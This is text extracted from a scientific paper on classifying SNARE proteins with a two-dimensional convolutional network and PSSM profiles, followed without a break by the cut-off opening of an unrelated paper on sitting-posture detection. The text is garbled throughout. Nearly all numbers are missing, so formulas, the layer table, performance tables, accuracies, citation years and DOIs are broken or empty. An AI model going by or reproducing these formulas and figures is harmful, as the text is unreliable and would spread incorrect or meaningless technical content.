dimensions when we added the zero padding layer into our network. after we applied the filters into the input shape, the output dimension was not different under the effect of the zero padding. zp= k− ( ) where k is the filter size. next, the d convolution layer was used with a kernel size of × , meaning that the features will be learned with the × matrices and sliced to the end. after each step, the next layer will take the weights and biases from its previous layer and train again. normally, a d max-pooling layer follows the d convolution layer. there are several parameters for a max-pooling layer, i.e., loop size and stride. in our study, we performed max pooling by a stride of through the selection of the maximum value over a window of . by using this process, we can reduce the processing time in the next layers. the output size of a convolutional layer is computed as follow. os= w−k+ p s + ( ) where w is the input size, k is the filter size, p is the padding and s is the stride size. le and nguyen ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. output layers the first layer in the output layer is a flatten layer. a flatten layer is always included before fully connected layers to convert the input matrix into a vector. we applied two fully connected layers in which each node is fully-connected to all the nodes of the previous layer. fully connected layers are typically used in the last stages of cnns. all the nodes of the first layer are connected to the flatten layer to allow the model to gain more knowledge and perform better. the second layer connects the first fully-connected layer to the output layer. moreover, we inserted the next layer, dropout, to enhance the performance results of the model and it also helps our model prevent overfitting (srivastava et al., ). in the dropout layer, the model will randomly deactivate a number of neurons with a certain probability p. by tuning the dropout value (from to ), we will save a lot of computing time for the next layers, and the training time will be faster. furthermore, an additional non-linear operation called relu (rectified linear unit) was performed after each convolution operation. to define the relu output, we used this formula: f (x)=max( ,x) ( ) where x is the number of inputs into a neural network. the output of the model was computed through a softmax function by which the probability for each possible output was determined. the softmax function is a logistic function which is defined by the following formula: σ(z)i= ezi∑k k= e zk ( ) where z is the input vector with k-dimensional vector, k-dimensional vector σ(z) is real values in the range ( , ) and jth class is the predicted probability from sample vector x. in summary, we set a total of , trainable parameters in the model (table ). performance evaluation the most important purpose of the present study was to predict whether or not a sequence is snare protein; therefore, we used ‘‘positive’’ to define the snare protein, and ‘‘negative’’ to define the non-snare protein. for each dataset, we first trained the model by applying -fold cross-validation technique on the training dataset. based on the -fold cross-validation results, hyper-parameter optimization process was employed to find the best model for each dataset. finally, the independent dataset was used to assess the predictive ability of the current model. based on the chou’s symbols introduced for studying protein signal peptides (chou, ), a set of four intuitive metrics were derived, as given in eq. of chen et al. ( ) or in eq. of xu et al. ( ). for evaluating the performance of the methods, we also adopted chou’s criterion used in many bioinformatics studies (chen et al., ; feng et al., ; taju et al., ). either the set of traditional metrics copied from math books or the intuitive metrics derived from the chou’s symbols (eqs. ( )–( )) are valid only for the single-label systems (where each sample only belongs to one class). for the multi-label systems (where a sample may simultaneously belong to several classes), whose existence le and nguyen ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table all layers and trainable parameters of the two-dimensional convolutional neural networks in this study. layer (type) output shape parameters # zeropadding d_ (none, , , ) conv d_ (none, , , ) , max_pooling d_ (none, , , ) zeropadding d_ (none, , , ) conv d_ (none, , , ) , max_pooling d_ (none, , , ) zeropadding d_ (none, , , ) conv d_ (none, , , ) , max_pooling d_ (none, , , ) zeropadding d_ (none, , , ) conv d_ (none, , , ) , max_pooling d_ (none, , , ) flatten_ (none, ) dense_ (none, ) , dropout_ (none, ) dense_ (none, ) activation_ (none, ) has become more frequent in system biology (cheng, xiao & chou, a; cheng, xiao & chou, b; cheng et al., a; xiao et al., a), system medicine (cheng et al., b) and biomedicine (qiu et al., ), a completely different set of metrics as defined in (chou, ) is absolutely needed. some standard metrics were used, such as sensitivity, specificity, accuracy, and matthews correlation coefficient (mcc) using below given formulae (tp, fp, tn, fn are true positive, false positive, true negative, and false negative values, respectively): sensitivity = − n+ − n+ , ≤sen≤ ( ) specificity = − n− + n− , ≤spec ≤ ( ) accuracy = − n+ − +n− + n++n− , ≤acc ≤ ( ) mcc = − ( n+ − n+ + n− + n− ) √( + n− + −n+ − n+ )( + n+ − −n− + n− ),− ≤mcc ≤ ( ) the relations between these symbols and the symbols in eqs. ( )–( ) are given by:  n− + =fp n+ − =fn n+=tp+n+ − n−=tn +n− + ( ) le and nguyen ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure amino acid composition in snare and non-snare proteins. full-size doi: . /peerjcs. /fig- results and discussions the quality and reliability of the modeling techniques of research is an important factor in the study. initially, we designed an experiment by analyzing data, perform calculations and take various comparisons in the results and discussions section. composition of amino acid in snare and non-snare proteins we analyzed the composition of amino acid and the variance of amino acid composition in snare sequences and non-snare sequences by computing the frequency between them. figure illustrates the amino acids which contributed the significantly highest frequency in two different datasets. we realized that the amino acid e, and k, and l occur at the highest frequencies surrounding the snare proteins. on the other hand, amino acids g and p occur at the highest frequencies surrounding the non-snare proteins. therefore, these amino acids certainly had an essential role in identifying snare proteins. thus, our model might predict snare proteins accurately via the special features from those amino acids contributions. performance for identifying snare proteins with d cnn we implemented our d cnn architecture by using keras package with tensorflow backend. first, we tried to find the optimal setup for the hidden layers by doing experiments using four different filter sizes: , , , and . table demonstrates the performance results from various filter layers in the cross-validation dataset. we easily observe that during the -fold cross-validation to identify snares, the model with filters was prominent identifying these sequences with an average -fold cross-validation accuracy of . %. the performance results are higher than the performances from the other results le and nguyen ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. table performance results of identifying snares with different filter layers. filters sens spec acc mcc . . . . – . . . – – . . . . – – – . . . . figure the validation accuracy on identifying snare proteins using different optimizers. full-size doi: . /peerjcs. /fig- with other filters. the sensitivity, specificity, and mcc for cross-validation data achieved . %, . %, and . , respectively. therefore, we used filters for the hidden layer to develop our model. we then optimized the neural networks using a variety of optimizers: rmsprop, adam, nadam, sgd, and adadelta. the model was reinitialized, i.e., a new network is built, after each round of optimization so as to provide a fair comparison between the different optimizers. overall, the performance results are shown in fig. and we decided to choose nadam, an optimizer with consistent performance to create our final model. improving the performance results and preventing overfitting problem with dropout it can be seen that there was a fair difference in performance between using the cross- validation dataset and the independent dataset. it is due to the non-removing similarity in cross-validation, and now we address this issue. to solve this issue, we applied an important technique called dropout (srivastava et al., ). table presents the performances of the model when we varied the dropout value from to . it can be seen that the performance from the dropout value of . was higher than others, with the sensitivity, specificity, le and nguyen ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. table performance results of identifying snares with different dropout levels. cross-validation independent dropout sens spec acc mcc sens spec acc mcc . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . accuracy, and mcc of . %, . %, . %, and . , respectively. in the independent dataset, the sensitivity, specificity, accuracy, and mcc were . %, . %, . %, and . , respectively. we can see that the performance of the independent dataset has been already improved and moved closer to that of the cross-validation dataset. therefore, the overfitting problem was gradually resolved, and we used this dropout value for our final model. moreover, the number of epochs used in the experiment extremely affects the performance results. to discover the optimal epoch, we ran our experiments by ranging the epoch value from the first epoch to the th epoch. during this process, we saved the checkpoint with the highest performance and used its parameters to create our model. until this final step, the independent sensitivity, specificity, accuracy, and mcc reached . %, . %, . % and . , respectively. this result is close to that of the cross-validation dataset at the same level of d cnn architecture. finally, our model applied filter layers, nadam optimizer, and dropout value of . to identify snare proteins with the highest performance. comparative performance for identifying snares between d cnn and shallow neural networks we examined the performances of using different machine learning classifiers for identifying snare proteins. we used four different classifiers (i.e., nearest neighbor (knn), gaussian, random forest, and support vector machine (svm)) to evaluate the model and compared d cnn results with their results. for a fair comparison, we definitely used the optimal parameters for all the classifiers in all the experiments. table shows the performance results between our method and other machine learning algorithms. it can be seen that our d cnn exhibited higher performance than those of the other traditional machine learning techniques using the same experimental setup. especially, our d cnn outperformed other algorithms when using the independent dataset. comparative performance for identifying snares between d cnn and blast search pipeline to make our prediction have convincing, we aimed to simply blasting the snare and non-snare sequences. the objective of this step is to check whether the first non-identical match was a snare/non-snare protein. we then compared with our pssm via psi- blast and the performance results were shown in table . it is easy to say that we are le and nguyen ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table comparative performance between d cnn and other shallow neural networks. classifier cross-validation independent sens spec acc mcc sens spec acc mcc knn . . . . . . . . randomforest . . . . . . . gaussian . . . . . . . . svm . . . . . . . d cnn . . . . . . . . table comparative performance between our classification method and blast search pipeline. method cross-validation independent sens spec acc mcc sens spec acc mcc blast . . . . . . . . d cnn . . . . . . . . able to reach a better performance when using the pssm profiles to build a classifier. it also means that blast can search a sequence within motifs, but it cannot capture hidden information in sequences. therefore, it is necessary and useful to create an advanced classifier with stronger features e.g., pssm profiles in this study. furthermore, source codes and publicly accessible web-servers represent the current trend for developing various computational methods (chen et al., ; cheng, xiao & chou, a; cheng, xiao & chou, b; chou, cheng & xiao, ; feng et al., ; jia et al., ; khan et al., ; le, ho & ou, ; xiao et al., b). actually, they have significantly enhanced the impacts of computational biology on medical science (chou, ), driving medicinal chemistry into an unprecedented revolution (chou, ), here we also publish our source codes and dataset at https://github.com/khanhlee/snare-cnn for presenting the new method reported in this paper. conclusions deep learning, a leading technique in various fields, has been increasingly applied in bioinformatics and computational biology. this study approaches a novel for identifying snare proteins by using deep learning. the idea is to transform pssm profiles into matrices and use them as the input to d cnn architectures. we evaluated the performance of our model, which was developed by using a d cnn and pssm profiles, using -fold cross-validation and an independent testing dataset. our method produced superior performance, and compared to other state-of-the-art neural networks, it achieved a significant improvement in all the typical measurement metrics. using our model, new snare proteins can be accurately identified and used for drug development. moreover, the contribution of this study could help further research to promote the use of d cnn in bioinformatics, especially in protein function prediction. le and nguyen ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://github.com/khanhlee/snare-cnn http://dx.doi.org/ . /peerj-cs. additional information and declarations funding the authors received no funding for this work. competing interests the authors declare there are no competing interests. author contributions • nguyen quoc khanh le conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, prepared figures and/or tables, performed the computation work, authored or reviewed drafts of the paper, approved the final draft. • van-nui nguyen conceived and designed the experiments, authored or reviewed drafts of the paper, approved the final draft. data availability the following information was supplied regarding data availability: data is available at github: https://github.com/khanhlee/snare-cnn. references altschul sf, madden tl, schäffer aa, zhang j, zhang z, miller w, lipman dj. . gapped blast and psi-blast: a new generation of protein database search programs. nucleic acids research ( ): – doi . /nar/ . . . amidi a, amidi s, vlachakis d, megalooikonomou v, paragios n, zacharaki ei. . enzynet: enzyme classification using d convolutional neural networks on spatial representation. peerj :e doi . /peerj. . burlet g, hindle a. . isolated guitar transcription using a deep belief network. peerj computer science :e doi . /peerj-cs. . chang c-c, lin c-j. . libsvm: a library for support vector machines. acm transactions on intelligent systems and technology ( ):article . chen j, liu h, yang j, chou k-c. . prediction of linear b-cell epitopes using amino acid pair antigenicity scale. amino acids ( ): – doi . /s - - - . chen w, ding h, zhou x, lin h, chou k-c. . irna(m a)-psednc: identifying n -methyladenosine sites using pseudo dinucleotide composition. analytical biochemistry – : – doi . /j.ab. . . . chen w, feng p-m, lin h, chou k-c. . irspot-psednc: identify recombination spots with pseudo dinucleotide composition. nucleic acids research ( ):e -e doi . /nar/gks . cheng x, xiao x, chou k-c. a. ploc-mplant: predict subcellular localization of multi-location plant proteins by incorporating the optimal go information into general pseaac. molecular biosystems ( ): – doi . /c mb j. le and nguyen ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://github.com/khanhlee/snare-cnn http://dx.doi.org/ . /nar/ . . http://dx.doi.org/ . /peerj. http://dx.doi.org/ . /peerj-cs. http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /j.ab. . . http://dx.doi.org/ . /nar/gks http://dx.doi.org/ . /c mb j http://dx.doi.org/ . /peerj-cs. cheng x, xiao x, chou k-c. b. ploc-mvirus: predict subcellular localization of multi-location virus proteins via incorporating the optimal go information into general pseaac. gene : – doi . /j.gene. . . . cheng x, xiao x, chou k-c. a. ploc-meuk: predict subcellular localization of multi-label eukaryotic proteins by extracting the key go information into general pseaac. genomics ( ): – doi . /j.ygeno. . . . cheng x, xiao x, chou k-c. b. ploc-mgneg: predict subcellular localization of gram-negative bacterial proteins by deep gene ontology learning via general pseaac. genomics ( ): – doi . /j.ygeno. . . . cheng x, zhao s-g, lin w-z, xiao x, chou k-c. a. ploc-manimal: predict subcellular localization of animal proteins with both single and multiple sites. bioinformatics ( ): – doi . /bioinformatics/btx . cheng x, zhao s-g, xiao x, chou k-c. b. iatc-misf: a multi-label classifier for predicting the classes of anatomical therapeutic chemicals. bioinformatics ( ): – doi . /bioinformatics/btw . chou k-c. . prediction of signal peptides using scaled window. peptides ( ): – doi . /s - ( ) -x. chou k-c. . some remarks on protein attribute prediction and pseudo amino acid composition. journal of theoretical biology ( ): – doi . /j.jtbi. . . . chou k-c. . some remarks on predicting multi-label attributes in molecular biosystems. molecular biosystems ( ): – doi . /c mb g. chou k-c. . impacts of bioinformatics to medicinal chemistry. medicinal chemistry ( ): – doi . / . chou k-c. . an unprecedented revolution in medicinal chemistry driven by the progress of biological science. current topics in medicinal chemistry ( ): – doi . / . chou k-c, cheng x, xiao x. . ploc_bal-mhum: predict subcellular localization of human proteins by pseaac and quasi-balancing training dataset. genomics doi . /j.ygeno. . . . feng p, yang h, ding h, lin h, chen w, chou k-c. . idna ma-pseknc: identi- fying dna n -methyladenosine sites by incorporating nucleotide physicochemical properties into pseknc. genomics ( ): – doi . /j.ygeno. . . . feng p-m, chen w, lin h, chou k-c. . ihsp-pseraaac: identifying the heat shock protein families using pseudo reduced amino acid alphabet composition. analytical biochemistry ( ): – doi . /j.ab. . . . fernandes k, chicco d, cardoso js, fernandes j. . supervised deep learning embeddings for the prediction of cervical cancer diagnosis. peerj computer science :e doi . /peerj-cs. . honer wg, falkai p, bayer ta, xie j, hu l, li h-y, arango v, mann jj, dwork aj, trimble ws. . abnormalities of snare mechanism proteins in an- terior frontal cortex in severe mental illness. cerebral cortex ( ): – doi . /cercor/ . . . le and nguyen ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /j.gene. . . http://dx.doi.org/ . /j.ygeno. . . http://dx.doi.org/ . /j.ygeno. . . http://dx.doi.org/ . /bioinformatics/btx http://dx.doi.org/ . /bioinformatics/btw http://dx.doi.org/ . /s - ( ) -x http://dx.doi.org/ . /j.jtbi. . . http://dx.doi.org/ . /c mb g http://dx.doi.org/ . / http://dx.doi.org/ . / http://dx.doi.org/ . /j.ygeno. . . http://dx.doi.org/ . /j.ygeno. . . http://dx.doi.org/ . /j.ab. . . http://dx.doi.org/ . /peerj-cs. http://dx.doi.org/ . /cercor/ . . http://dx.doi.org/ . /peerj-cs. hou c, wang y, liu j, wang c, long j. . neurodegenerative disease related proteins have negative effects on snare-mediated membrane fusion in pathological confir- mation. frontiers in molecular neuroscience : doi . /fnmol. . . jahn r, scheller rh. . snares—engines for membrane fusion. nature reviews molecular cell biology : – doi . /nrm . jia j, li x, qiu w, xiao x, chou k-c. . ippi-pseaac(cgr): identify protein- protein interactions by incorporating chaos game representation into pseaac. journal of theoretical biology : – doi . /j.jtbi. . . . jones dt. . protein secondary structure prediction based on position-specific scoring matrices . journal of molecular biology ( ): – doi . /jmbi. . . khan yd, rasool n, hussain w, khan sa, chou k-c. . iphost-pseaac: identify phosphothreonine sites by incorporating sequence statistical moments into pseaac. analytical biochemistry : – doi . /j.ab. . . . kienle n, kloepper th, fasshauer d. . phylogeny of the snare vesicle fusion machinery yields insights into the conservation of the secretory pathway in fungi. bmc evolutionary biology ( ): doi . / - - - . kloepper th, kienle cn, fasshauer d. . an elaborate classification of snare proteins sheds light on the conservation of the eukaryotic endomembrane system. molecular biology of the cell ( ): – doi . /mbc.e - - . kloepper th, kienle cn, fasshauer d. . snareing the basis of multicellularity: consequences of protein family expansion during evolution. molecular biology and evolution ( ): – doi . /molbev/msn . le nqk, ho q-t, ou y-y. . incorporating deep learning with convolutional neural networks and position specific scoring matrices for identifying electron transport proteins. journal of computational chemistry ( ): – doi . /jcc. . le nqk, ho q-t, ou y-y. . classifying the molecular functions of rab gtpases in membrane trafficking using deep convolutional neural networks. analytical biochemistry : – doi . /j.ab. . . . le nqk, ho q-t, ou y-y. . using two-dimensional convolutional neural networks for identifying gtp binding sites in rab proteins. journal of bioinformatics and computational biology ( ): doi . /s . le nqk, nguyen t-t-d, ou y-y. . identifying the molecular functions of electron transport proteins using radial basis function networks and bio- chemical properties. journal of molecular graphics and modelling : – doi . /j.jmgm. . . . le nqk, ou y-y. a. incorporating efficient radial basis function networks and significant amino acid pairs for predicting gtp binding sites in transport proteins. bmc bioinformatics ( ): doi . /s - - -y. le nqk, ou y-y. b. prediction of fad binding sites in electron transport proteins according to efficient radial basis function networks and significant amino acid pairs. bmc bioinformatics ( ): doi . /s - - -x. le and nguyen ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /fnmol. . http://dx.doi.org/ . /nrm http://dx.doi.org/ . /j.jtbi. . . http://dx.doi.org/ . /jmbi. . http://dx.doi.org/ . /j.ab. . . http://dx.doi.org/ . / - - - http://dx.doi.org/ . /mbc.e - - http://dx.doi.org/ . /molbev/msn http://dx.doi.org/ . /jcc. http://dx.doi.org/ . /j.ab. . . http://dx.doi.org/ . /s http://dx.doi.org/ . /j.jmgm. . . http://dx.doi.org/ . /s - - -y http://dx.doi.org/ . /s - - -x http://dx.doi.org/ . /peerj-cs. le nqk, sandag ga, ou y-y. . incorporating post translational modification information for enhancing the predictive performance of membrane transport proteins. computational biology and chemistry : – doi . /j.compbiolchem. . . . lecun y, bengio y, hinton g. . deep learning. nature ( ): – doi . /nature . lu b. . the destructive effect of botulinum neurotoxins on the snare protein: snap- and synaptic membrane fusion. peerj :e doi . /peerj. . meng j, wang j. . role of snare proteins in tumourigenesis and their potential as targets for novel anti-cancer therapeutics. biochimica et biophysica acta (bba) - reviews on cancer ( ): – doi . /j.bbcan. . . . ou yy, chen sa, gromiha mm. . classification of transporters using efficient radial basis function networks with position-specific scoring matrices and biochemical properties. proteins: structure, function, and bioinformatics ( ): – doi . /prot. . oyang y-j, hwang s-c, ou y-y, chen c-y, chen z-w. . data classifica- tion with radial basis function networks based on a novel kernel density es- timation algorithm. ieee transactions on neural networks ( ): – doi . /tnn. . . palatnik de sousa i. . convolutional ensembles for arabic handwritten character and digit recognition. peerj computer science :e doi . /peerj-cs. . qiu w-r, sun b-q, xiao x, xu z-c, chou k-c. . iptm-mlys: identifying multiple lysine ptm sites and their different types. bioinformatics ( ): – doi . /bioinformatics/btw . shi x, halder p, yavuz h, jahn r, shuman ha. . direct targeting of membrane fu- sion by snare mimicry: convergent evolution of legionella effectors. proceedings of the national academy of sciences of the united states of america ( ): – doi . /pnas. . shimizu k, hirose s, noguchi t. . poodle-s: web application for predicting protein disorder by using physicochemical features and reduced amino acid set of a position-specific scoring matrix. bioinformatics ( ): – doi . /bioinformatics/btm . spencer m, eickholt j, cheng j. . a deep learning network approach to ab initio protein secondary structure prediction. ieee/acm transactions on computational biology and bioinformatics (tcbb) ( ): – doi . /tcbb. . . srivastava n, hinton g, krizhevsky a, sutskever i, salakhutdinov r. . dropout: a simple way to prevent neural networks from overfitting. the journal of machine learning research ( ): – . sun q, huang x, zhang q, qu j, shen y, wang x, sun h, wang j, xu l, chen x, ren b. . snap promotes the malignant process of ovarian cancer. journal of ovarian research ( ): doi . /s - - - . le and nguyen ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /j.compbiolchem. . . http://dx.doi.org/ . /nature http://dx.doi.org/ . /peerj. http://dx.doi.org/ . /j.bbcan. . . http://dx.doi.org/ . /prot. http://dx.doi.org/ . /tnn. . http://dx.doi.org/ . /peerj-cs. http://dx.doi.org/ . /bioinformatics/btw http://dx.doi.org/ . /pnas. http://dx.doi.org/ . /bioinformatics/btm http://dx.doi.org/ . /tcbb. . http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /peerj-cs. taju sw, nguyen t-t-d, le n-q-k, kusuma rmi, ou y-y. . deepefflux: a d convolutional neural network model for identifying families of efflux proteins in transporters. bioinformatics ( ): – doi . /bioinformatics/bty . uniprot consortium. . uniprot: a hub for protein information. nucleic acids research (d ):d –d doi . /nar/gku . van dijk adj, bosch d, ter braak cjf, van der krol ar, van ham rchj. . predicting sub-golgi localization of type ii membrane proteins. bioinformatics ( ): – doi . /bioinformatics/btn . wang k, hoeksema j, liang c. . pirnn: deep learning algorithm for pirna prediction. peerj :e doi . /peerj. . weimbs t, low sh, chapin sj, mostov ke, bucher p, hofmann k. . a conserved domain is present in different families of vesicular fusion proteins: a new superfam- ily. proceedings of the national academy of sciences of the united states of america ( ): – doi . /pnas. . . . wickner w, schekman r. . membrane fusion. nature structural & molecular biology ( ): doi . /nsmb. . xiao x, cheng x, chen g, mao q, chou k-c. a. ploc_bal-mgpos: predict sub- cellular localization of gram-positive bacterial proteins by quasi-balancing training dataset and pseaac. genomics doi . /j.ygeno. . . . xiao x, xu z-c, qiu w-r, wang p, ge h-t, chou k-c. b. ipsw( l)-pseknc: a two-layer predictor for identifying promoters and their strength by hybrid features via pseudo k-tuple nucleotide composition. genomics doi . /j.ygeno. . . . xu y, shao x-j, wu l-y, deng n-y, chou k-c. . isno-aapair: incorporating amino acid pairwise coupling into pseaac for predicting cysteine s-nitrosylation sites in proteins. peerj :e doi . /peerj. . yoshizawa ac, kawashima s, okuda s, fujita m, itoh m, moriya y, hattori m, kanehisa m. . extracting sequence motifs and the phylogenetic features of snare-dependent membrane traffic. traffic ( ): – doi . /j. - . . .x. le and nguyen ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /bioinformatics/bty http://dx.doi.org/ . /nar/gku http://dx.doi.org/ . /bioinformatics/btn http://dx.doi.org/ . /peerj. http://dx.doi.org/ . /pnas. . . http://dx.doi.org/ . /nsmb. http://dx.doi.org/ . /j.ygeno. . . http://dx.doi.org/ . /j.ygeno. . . http://dx.doi.org/ . /peerj. http://dx.doi.org/ . /j. - . . .x http://dx.doi.org/ . /peerj-cs. detection of sitting posture using hierarchical image composition and deep learning detection of sitting posture using hierarchical image composition and deep learning audrius kulikajevas , rytis maskeliunas and robertas damaševičius , department of multimedia engineering, kaunas university of technology, kaunas, lithuania department of applied informatics, vytautas magnus university, kaunas, lithuania faculty of applied mathematics, silesian university of technology, gliwice, poland abstract human posture detection allows the capture of the kinematic parameters of the human body, which is important for many applications, such as assisted living, healthcare, physical exercising and rehabilitation. this task can greatly benefit from recent development in deep learning and computer vision. in this paper, we propose a novel deep recurrent hierarchical network (drhn) model based on mobilenetv that allows for greater flexibility by reducing or eliminating posture detection problems related to a limited visibility human torso in the frame, i.e., the occlusion problem. the drhn network accepts the rgb-depth frame sequences and produces a representation of semantically related posture states. we achieved . % accuracy at fps rate for sitting posture recognition. subjects human-computer interaction, artificial intelligence, computer vision keywords posture detection, computer vision, deep learning, artificial neural network, depth sensors, sitting posture, e-health introduction machine learning and deep learning has shown very good results when applied to various computer vision applications such as detection of plant diseases in agriculture (kamilaris & prenafeta-boldú, ), fault diagnosis in industrial engineering (wen et al., ), brain tumor recognition from mr images (chen et al., a), segmentation of endoscopic images for gastric cancer (hirasawa et al., ), or skin lesion recognition (li & shen, ) and even autonomous vehicles (alam et al., ). as our daily life increasingly depends on sitting work and the opportunities for physical exercising (in the context of covid- pandemic associated restrictions and lockdowns are diminished), many people are facing various medical conditions directly related to such sedentary lifestyles. one of the frequently mentioned problems is back pain, with bad sitting posture being one of the compounding factors to this problem (grandjean & hünting, ; sharma & majumdar, ). inadequate postures adopted by office workers are one of the most significant risk factors of work-related musculoskeletal disorders. the direct consequence may be back pain, while indirectly it has been associated with cervical disease, myopia, cardiovascular diseases and premature mortality (cagnie et al., ). one study (alberdi et al., ) has demonstrated that body posture is one of the best predictors of stress and mental workload levels. another study linked postural instability and gait difficulty with a rapid rate of parkinson’s disease progression how to cite this article kulikajevas a, maskeliunas r, damaševičius r. . detection of sitting posture using hierarchical image composition and deep learning. peerj comput. sci. :e doi . /peerj-cs. submitted november accepted february published march corresponding author robertas damaševičius, robertas.damasevicius@polsl.pl academic editor siddhartha bhattacharyya additional information and declarations can be found on page doi . /peerj-cs. copyright kulikajevas et al. distributed under creative commons cc-by . http://dx.doi.org/ . /peerj-cs. mailto:robertas.�damasevicius@�polsl.�pl https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://www.creativecommons.org/licenses/by/ . / http://www.creativecommons.org/licenses/by/ . / https://peerj.com/computer-science/ (jankovic et al., ). posture recognition is also relevant for disabled people (ma et al., ) and elderly people for proper health diagnostics (chen et al., b) as the sedentary behavior has a negative effect on people’s wellbeing and health. therefore, the solutions that would improve the daily living conditions of both healthy and spine pain affected people in the context of assisted living environments (maskeliunas, damaševičius & segal, ). while there are existing classical approaches for human posture prediction, unfortunately, they generally assert that entire human skeleton is visible in frame. even though those assumptions of scene composition are valid, with everyone moving to their home offices, meeting them is simply not feasible. not everyone is capable of having complex multi-camera setups to track their body posture. for this reason, there is a need for a solution that is able to inform the end-user (or their care provider) of their bad posture with cheaply available consumer sensors in order to improve their wellbeing without real-time supervision. with the renaissance of machine learning, and its application in computer vision tasks, we are able to solve a lot of complex tasks using black box models by shifting the majority of computations from the end-user device into the training stage. for this reason, artificial neural networks have been used in wide variety of applications. in this article, we propose a novel deep recurrent hierarchical neural network approach for tracking human posture in home office environments, where majority of the person sitting at the desk and therefore is occluded from the camera. additionally, a pilot of test subjects is made in order to validate our approach effectiveness. related work the existing solutions such as orthopedic posture braces may not be viable solution due to other underlying medical conditions. computer-aided posture tracking combined with behaviour improvement techniques due to continuous monitoring and self-assessment can contribute to remedy this issue (dias & cunha, ). the most prominent solution to this problem is skeleton based posture recognition (jiang et al., ) using commercially available depth sensors such as microsoft kinect (zhang, ) and intel realsense (keselman et al., ). however, these solutions generally depend on some assertions, i.e., camera calibration settings, lightning conditions, expected posture (hondori & khademi, ), often making the results unreliable. for identifying inadequate posture wearable textile sensors (garcía patiño, khoshnam & menon, ), inertial and magnetic sensors attached to human body (bouvier et al., ), depth cameras (ho et al., ), radio-frequency identification tags (saab & msheik, ), d motion analysis (perusquía-hernández et al., ), video surveillance (afza et al., ), kinect sensors (ryselis et al., ) and sensors attached to office chairs (zemp et al., ; bibbo et al., ) were used, while registering body posture parameters such as forward inclination, distance to the computer, and relative skeletal angles. however, the camera-based systems have demanding requirements for distance, proper lighting, calibration and non-occlusion. kulikajevas et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ another approach focuses on wiring sensors directly to the human body to acquire data, although it limits the freedom of movement for work activities (arnold et al., ). despite these achievements, it is still quite difficult to recognize posture in real-time or correctly identify transitional activities in real-world environments (nweke et al., ) as the recognition of fine-grained activities such as correct or incorrect cases of sitting postures is still a problem (chin et al., ). currently, the state of the art in non-invasive posture tracking is depth and image processing (abobakr, hossny & nahavandi, ; matthew et al., ; camalan et al., ). for example, huang & gao ( ) reconstruct realistic d human poses using the d coordinates of joint points captured by the depth camera and employ conformal geometric algebra to improve human limb modelling. li, bai & han ( ) used optitrack and kinect v to get and transfer data into a human skeleton coordinates. they used random forest regression learn the joint offset regression function, and adjust the skeleton based on the predictions on joint offset. finally, as a result, they can determine the motions based on predicted posture. liu et al. ( ) suggested d convolutional neural network (cnn), called d posturenet, while gaussian voxel modeling is adopted to represent posture configurations. the method allows to eliminate the coordinate deviations caused by various recording environments and posture displacements. pham et al. ( ) exploit deep cnns based on the densenet model to learn directly an end-to- end mapping between the input skeleton sequences and their action label for human activity recognition. the network learns spatio—temporal patterns of skeletal movements and their discriminative features for further downstream classification tasks. sengupta et al. ( ) detect skeletal joints using mmwave radar reflection signals. first, the reflected radar point cloud. next, cnn was trained on radar-to-image representation and used to predict the position of the skeletal joints in -d space. the method was evaluated in a single person scenario using four primary motions. the method has shown to be robust in adverse weather conditions and deviations in light conditions. however, none of the above mentioned methods are applicable when only the upper part of the body is visible. some methods tried to tackle this problem by exploiting the temporal relationship between the body parts to deal with the occlusion problem and to get the occluded depth information (huang, hsu & huang, ) or by recreating a topological character (bei et al., ), yet they still require a recreation of a full body skeleton. to address this problem, we propose a novel approach for human posture classification by using a supervised hierarchical neural network (liu et al., ) that uses the rgb-depth data as input. our method extends mobilenetv (sandler et al., ) neural network to include the recurrent layers. this allows the network to learn from a sequence of images by adding the dimension of time to our feature list. allowing the network to use the context of what happened in previous frames to make predictions. this is an improvement over existing methods for skeleton prediction as this allows for our approach to predict user posture in more complex environments, for example, when a person is sitting in front of an office desk thus a large portion of his/her body is occluded. kulikajevas et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ such position would cause other known skeleton-based posture prediction methods to fail, due to lack of data provided by the sensors to infer the full human skeleton. our novelty is the use only a simple depth camera, so the subject does not need to wear any sensors on their body nor have entire body visible in sensor field of view. in fact, only the upper % of the body may be visible, whereas when using the kinect style sensor, the lower legs must be visible or generated artificially to allow the reconstruction of the skeleton or, otherwise, the recognition process fails. our approach does not rely on a (visual or artificial) reconstruction of the full skeleton and, thus, allows for the detection of posture in advanced scenarios such as sitting at a desk, where a camera often receives very limited information. methods network architecture our preliminary analysis has shown that it is very hard to predict human posture based on a single shot. for this reason, we opted to use time sequences with n = frames. however, during training the input has a variable length of ≤ n ≤ , with each frame being about a second apart to reduce the dependence on the previous frames. we selected to use deep convolutional recurrent neural networks for they have shown some of the best capabilities when it comes to similar tasks requiring to predict sequences of data as with natural speech recognition (sundermeyer, ney & schlu, ; graves, mohamed & hinton, ) or even traffic prediction (ji & hong, ). the input of our network architecture (fig. ) is the rgb-d frame sequence that is 